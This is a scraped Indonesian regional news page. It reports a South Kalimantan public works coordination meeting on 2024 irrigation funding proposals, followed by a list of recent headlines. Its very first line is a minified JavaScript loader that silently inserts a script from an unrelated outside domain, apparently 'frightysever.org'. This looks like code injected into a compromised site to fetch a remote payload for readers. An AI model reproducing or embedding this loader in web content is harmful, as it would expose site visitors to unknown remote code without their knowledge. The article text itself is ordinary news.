(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
PUPR PROV KALSEL

Bahas Usulan DAK Irigasi 2024, Dinas PUPR Kalsel Gelar Rakor


KANALKALIMANTAN.COM, BANJARBARU – Rapat Koordinasi dan Sinkronisasi Usulan Dana Alokasi Khusus (DAK) Tahun 2024 Bidang Irigasi Lingkup Pemerintah Provinsi dan Kabupaten/kota di Kalsel digelar Senin (23/10/2023).

Kegiatan itu dilaksanakan oleh Dinas Pekerjaan Umum dan Penataan Ruang (PUPRP) Provinsi Kalimantan Selatan.

Kepala Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Kalsel, Ir Ahmad Solhan ST, MT dalam sambutannya yang dibacakan Sekretaris PUPR Kalsel, Andri Fadli mengatakan, melalui rakor ini dapat tercipta pemahaman dalam penyusunan usulan DAK bidang irigasi tahun anggaran 2024.

Baca juga: Perbaikan Pipa Bocor di Jalan Pramuka, Berikut Wilayah Terdampak Seret Air 12 Jam

Sehingga pemerintah daerah baik provinsi maupun kabupaten/kota, yang masuk maupun yang belum berkesempatan masuk dalam lokasi prioritas DAK bidang irigasi tahun anggaran 2024 mampu melaksanakan kegiatan DAK dengan baik.

“Dengan rapat ini diharapkan provinsi dan kabupaten/kota dapat mengetahui dan memperoleh gambaran kriteria lokasi prioritas, syarat-syarat, ketentuan pengusulan dan hal-hal yang perlu diperhatikan untuk selalu menjaga output dan outcome dalam pelaksanaan dak bidang irigasi,” kata Andri saat membacakan sambutan.

Dia menambahkan, Kalsel sebagai gerbang ibu kota negara, dapat ikut berperan serta dalam pemenuhan kebutuhan terutama pangan bagi ibu kota negara.

Baca juga: Gubernur Kalsel Terima Penghargaan Proklim 2023 dari Menteri LHK

Untuk itu, lanjut dia, secara bersama berkoordinasi dan berdiskusi terkait langkah-langkah apa yang harus dilakukan agar dalam pelaksanaan DAK bidang irigasi kalimantan selatan tahun anggaran 2024 dapat berjalan baik dan lancar.

“Besar harapan, Kalsel baik provinsi maupun kabupaten/kota bisa masuk dalam lokasi prioritas kegiatan DAK bidang irigasi di tahun anggaran selanjutnya, melalui pembangunan maupun perbaikan infrastruktur irigasi dalam meningkatkan kinerja daerah irigasi, sehingga mampu meningkatkan produktivitas tanaman khususnya padi,” harap dia.

Dia mengingatkan agar semua peserta rapat lebih memperhatikan prioritas usulan dan selalu menjaga kesesuaian antara output dan outcome dalam pelaksanaan DAK bidang irigasi bagi yang menjadi calon penerima dana DAK dan yang belum berkesempatan.

Baca juga: Siap Hadapi STQH XXVI di Jambi, LPTQ Banjar Silaturahmi ke Saidi Mansyur

Sementara itu, Kepala Seksi Pembinaan Teknis Sungai, Pantai dan Rawa Dinas PUPR Kalsel, Ihsan Riskiyandi Perdana menyampaikan pada Rakor sebelumnya, Dinas PUPR Provinsi Kalsel mengusulkan DAK Bidang Irigasi Lingkup Pemerintah Provinsi sebesar Rp 24 miliar yang akan melakukan penanganan bagi Kabupaten Hulu Sungai Selatan, yakni di Nagara.

“DAK ini nantinya Pemprov Kalsel yang akan melaksanakannya, dengan pengerjaan berupa rehab seperti normalisasi saluran, galian dan perbaikan pintu air di kawasan rawa Negara yang luasannya sekitar 2 ribu hektare,” ucap dia.

Dia berharap, dengan adanya pengerjaan tersebut dapat memberikan manfaat bagi masyarakat untuk menikmati hasilnya terlebih di bidang pertanian.

“Harapannya dengan adanya DAK ini bisa memberikan manfaat bagi masyarakat Kalsel seperti arahan gubernur dalam menyejahterakan masyarakat,” pungkas dia.

Adapun selain Pemprov Kalsel yang mendapat DAK langsung dari pemerintah pusat, juga ada 5 kabupaten yang menerimanya, yakni Kabupaten Kota Baru, Tanah Bumbu, Hulu Sungai Utara, Barito Kuala dan Kabupaten Banjar. (kanalkalimantan.com/MCKalsel/kk)

Reporter : kk
Editor: Dhani


Muhammad Andi

Recent Posts

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

12 jam ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

12 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

13 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

13 jam ago

Layanan Posyandu Terintegrasi di Desa Manusup

KANALKALIMANTAN.COM, KUALA KAPUAS – Upaya memberikan pelayanan kesehatan dasar kepada masyarakat terus dilakukan Pos Pelayanan… Read More

13 jam ago

Kampung KB Guntung Manggis Masuk Enam Besar Nasional

KANALKALIMANTAN.COM, BANJARBARU - Dukungan segenap unsur pemerintahan mengantarkan Kampung Keluarga Berkualitas (KB) Kelurahan Guntung Manggis… Read More

14 jam ago

This website uses cookies.